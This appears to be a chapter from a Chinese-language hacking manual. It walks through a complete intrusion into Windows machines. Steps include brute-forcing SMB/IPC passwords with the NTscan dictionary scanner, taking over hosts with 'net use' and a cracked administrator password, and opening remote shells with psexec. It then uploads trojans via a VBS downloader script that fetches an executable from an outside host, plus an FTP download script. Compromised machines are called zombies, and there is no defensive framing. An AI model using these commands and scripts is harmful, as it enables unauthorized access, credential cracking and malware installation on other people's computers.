1.12 Windows口令扫描攻击

Windows口令扫描攻击主要针对某个IP地址或者网段进口令扫描,其实质是通过139、445等端口尝试建立连接,利用的是DOS命令“net use \\ipaddress\admin$ "password" /u:user”,只不过是通过程序实现而已。本节给出一个使用扫描软件NTscan扫描口令,得到口令后成功实施控制的案例。

1.12.1 设置NTscan

直接运行NTscan。在NTscan中,一般只需要设置开始IP地址和结束IP地址,其他均采用默认设置,如图1-67所示。

0068-1

图1-67 设置NTscan

说明

(1)如果是在肉机上进行口令扫描,由于语言版本不同,若操作系统不支持中文,就有可能显示乱码,这时只能凭借对系统的熟悉程度进行设置。本例是在英文操作系统中使用NTscan,在其运行界面上一些汉字会显示为“?”,但不影响扫描,如图1-68所示。

0068-2

图1-68 NTscan显示乱码

(2)在NTscan中有IPC、SMB和WMI共3种扫描方式。IPC和WMI方式扫描口令较为有效,SMB方式主要用来扫描共享文件。通过IPC方式,可以与目标主机建立一个空的连接而无须用户名和密码,还可以得到目标主机上的用户列表。SMB(服务器信息块)协议是一种IBM协议,用于在计算机之间共享文件、打印机、串口等。SMB协议可以用在因特网TCP/IP协议之上,也可以用在其他网络协议(如IPX和NetBEUI)之上。

(3)WMI(Windows管理规范)是Windows管理技术中的一项核心技术。作为一种规范和基础结构,通过WMI可以访问、配置、管理和监视几乎所有的Windows资源。例如,在远程计算机上启动一个进程,设定一个在特定日期和时间运行的进程,远程启动计算机,获得本地或远程计算机的已安装程序列表,查询本地或远程计算机的Windows事件日志等。一般情况下,可以在本地计算机上执行的WMI操作,也可以在远程计算机上执行,只要用户拥有该计算机的管理员权限即可。如果用户对远程计算机拥有权限,并且远程计算机支持远程访问,那么用户就可以连接该远程计算机并执行拥有相应权限的操作。

1.12.2 执行扫描

在NTscan运行界面上单击“开始”按钮(如果显示为乱码,如图1-67所示,单击位于左侧设置区下方的第1个按钮),开始扫描,如图1-69所示。

0069-1

图1-69 扫描口令

说明

(1)NTscan扫描口令与字典有关,其原理就是将字典中的口令与实际口令进行对比,如果相同就可以建立连接,即破解成功。破解成功后会在NTscan窗口下方显示提示信息。

(2)NTscan的字典文件为NT_pass.dic,用户文件为NT_user.dic。可以根据实际情况对字典文件和用户文件的内容进行修改。

(3)NTscan扫描结束后,会在NTscan程序当前目录下生成一个NTscan.txt文件。在该文件中会记录扫描结果,如图1-70所示。

0070-1

图1-70 NTscan扫描记录

(4)在NTscan中还有一些辅助功能,如单击鼠标右键后可以执行“cmd”命令,单击鼠标左键后可以执行“连接”、“打开远程登录”、“映射网络驱动器”等命令,如图1-71所示。

0070-2

图1-71 NTscan辅助功能

1.12.3 实施控制

在DOS命令提示符下输入命令“net use \\221.*.*.*\admin$ "mrs6100"/u:administrator”,获取主机的管理员权限。如图1-72所示,命令执行成功。

0071-1

图1-72 获取管理员权限

1.12.4 执行psexec命令

执行“psexec \\221.*.*.* cmd”命令,获取一个DOSShell,如图1-73所示。

0071-2

图1-73 获取DOS下的Shell

说明

(1)以上两步可以合并,直接在DOS命令提示符下输入命令“psexec \\ipaddress -u administrator -ppassword cmd”即可。例如,在上例中可以输入“psexec \\221.*.*.* -u Administrator -pmrs6100 cmd”命令来获取一个DOSShell。

(2)在某些情况下,“psexec \\ipaddress -u administrator -ppassword cmd”命令无法正常执行。

1.12.5 远程查看被入侵计算机的端口开放情况

使用“sfind -p 221.*.*.*”命令依次查看远程主机端口的开放情况。第1台主机仅开放了4899端口,第2台主机开放了80和4899端口,第3台主机开放了3389端口,如图1-74所示。

0072-1

图1-74 查看端口开放情况

1.12.6 上传文件

在该DOSShell下执行文件下载命令,将一些工具软件或者木马上传到被入侵计算机中,如图1-75所示。

0072-2

图1-75 上传文件

说明

(1)可以使用以下VBS脚本命令上传文件。

echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe 
echo set aso=.createobject("adodb.stream"):set web=createobject 
("microsoft.xmlhttp") >>dl.vbe 
echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then 
quit >>dl.vbe 
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile.arguments(1), 
2:end with >>dl.vbe 
cscript dl.vbe http://www.mymuma.com/software/systeminfo.exe systeminfo.exe 

(2)如果不能通过执行VBS脚本上传文件,则可以通过执行FTP命令上传文件。FTP命令如下。

echo open 192.168.1.1 >b 
echo ftp>>b 
echo ftp>>b 
echo bin>>b 
echo get systeminfo.exe >>b 
echo bye >>b  
ftp -s:b 

(3)上传文件时,建议先使用“dir filename”命令查看文件是否存在。上传文件后,再通过“dir filename”命令查看文件是否上传成功。

1.12.7 查看主机的基本信息

执行“systeminfo info”命令可以查看被入侵计算机的基本信息。该计算机的操作系统为Windows 2000 Professional,如图1-76所示。

0073-1

图1-76 查看主机的基本信息